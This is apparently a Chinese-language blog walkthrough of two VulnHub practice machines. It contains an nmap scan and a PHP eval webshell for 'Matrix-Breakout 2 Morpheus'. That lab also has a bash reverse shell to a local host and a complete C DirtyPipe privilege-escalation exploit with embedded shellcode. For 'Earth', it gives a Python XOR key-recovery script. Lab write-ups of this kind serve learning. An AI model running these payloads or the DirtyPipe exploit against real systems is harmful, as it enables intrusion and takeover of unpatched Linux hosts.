重生之我是土豆哥

vulnhub Matrix-Breakout: 2 Morpheus

nmap扫描本网段下的机器找到靶机

nmap -A -T4 -v 192.168.159.0/24

通过某神秘手段得知其存在graffiti.php与graffiti.txt。

访问可以发现它允许我往上面写东西：

burpsuit抓包可以让他写个一句话木马：

<?php @eval($_GET['hacker']); ?>

访问/fuck.php使其生效。蚁剑连接。

开启虚拟终端反弹shell。

bash -c 'bash -i >& /dev/tcp/192.168.159.132/9999 0>&1'

可以得到：

查看系统版本：

上传linpeas.sh：

用反弹的shell在靶机上运行linpeas.sh得到系统存在DirtyPipe漏洞：

编写如下脚本并上传可执行文件：

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#include <stdint.h>


unsigned char shellcode[] = {
    0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62,
    0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e,
    0x6a, 0x3b, 0x58, 0x0f, 0x05
};

int main(int argc,char* argv[])
{
    setvbuf(stdout,_IONBF,0,0);
    setvbuf(stderr,_IONBF,0,0);

    if(argc != 2)
    {
        exit(0);
    }

    char* targetFile = argv[1];

    int targetFd = open(targetFile,O_RDONLY);
    
    int pipeFd[2];
    pipe(pipeFd);

    //将pipe写满再读出,使每一个pipe_buffer带上PIPE_BUF_FLAG_CAN_MERGE标志
    char buf[PAGE_SIZE];
    size_t totalSize = 16*PAGE_SIZE;
    size_t ret_sz;
    while (totalSize)
    {
        ret_sz = write(pipeFd[1],buf,PAGE_SIZE);
        totalSize -= ret_sz;
    }
    
    totalSize = 16*PAGE_SIZE;
    while (totalSize)
    {
        ret_sz = read(pipeFd[0],buf,PAGE_SIZE);
        totalSize -= ret_sz;
    }

    //触发漏洞
    int ret = splice(targetFd,NULL,pipeFd[1],NULL,1,0);

    //写入目标文件
    ret = write(pipeFd[1],shellcode+1,sizeof(shellcode)-1);

    system(targetFile);

    return 0;
}

运行提权，完结撒花(命令行前面没有名字了，看着好难受)：

vulnhub Earth

nmap扫描，得到443端口有DNS解析：

在hosts文件中加入这个东西之后从域名进行访问可得：

对两个域名扫目录均可以得到：

在https中可以扫到robots.txt：

其中包含/testingnotes.*：

尝试可知其为.txt：

访问testdata.txt可知：

用这一串文字与主页面(earth.local)最长的数据做异或可以得到key：

from Crypto.Util.number import *

data = '2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a'
data_bytes = b''
plain = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."

for i in range(0, len(data), 2):
    data_bytes += long_to_bytes(int(data[i:i+2], 16))

for i in range(len(data_bytes)):
    print(chr(data_bytes[i] ^ plain[i]), end = '')